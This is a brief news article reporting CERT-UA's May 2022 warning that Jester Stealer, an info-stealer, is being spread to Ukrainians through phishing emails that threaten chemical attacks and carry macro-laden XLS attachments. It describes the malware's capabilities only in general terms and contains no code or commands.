Jester Stealer spread via phishing campaigns, CERT-UA warns

May 19, 2022
Jester Stealer Phishing Campaign CERT-UA Cyber Threat

Threat actors had been observed spreading another emerging malware dubbed Jester Stealer through phishing emails, as warned by Ukraine’s CERT-UA (Computer Emergency Response Team). In the phishing emails, the victims are threatened with looming ‘chemical attacks,’ thus forcing recipients to open the malicious files attached.

The Russia-Ukraine war had been going on for a few months already. Several forms of threats were also propagated against each country involved, including the use of lethal weapons in attacks. The fear that this crisis had brought Ukrainians was abused by many malicious actors, including blasting off phishing emails that forced them to open malware-infected attachments.

From the researchers’ found information, the phishing emails include a message about chemical weapons to be launched at midnight in Ukraine. Furthermore, the senders tell people to open the attachment enclosed since it allegedly has a list of the zones where chemical damage would be dispersed; hence opening it would save the lives of many Ukrainians.

However, the attachments contain XLS docs injected with malicious macros. If the victims open them via MS Office, the payload will be collected from a remote server and launched on the victims’ machines. The CERT-UA’s advisory explained that the executable files came from compromised sites, not from threat actors’ C2 infrastructure.

 

The Jester Stealer malware is an info-stealer strain with extensive capabilities, offered at cheap prices.

 

As it gained notoriety this year, threat actors had widely used Jester Stealer in their cyberattack campaigns. The info-stealer can collect data from the users’ browsers, including their passwords, emails, messaging apps, cryptocurrency wallet credentials, etc. The stolen data will be transmitted to a malicious server to be collected by its operators and be sold in underground marketplaces or be utilised in other attacks.

Moreover, Jester Stealer is also known for using AES-CBC-256 encryption to communicate with its threat operators through a Tor network server. It also sends the stolen data to Telegram channels owned by the operators.

The operators of the info-stealer have also employed detection bypassing features that prevent virtual machines from detecting and analysing the malware. As of now, there are no attributed threat actors in the ongoing phishing campaign against Ukraine.

About the author

Leave a Reply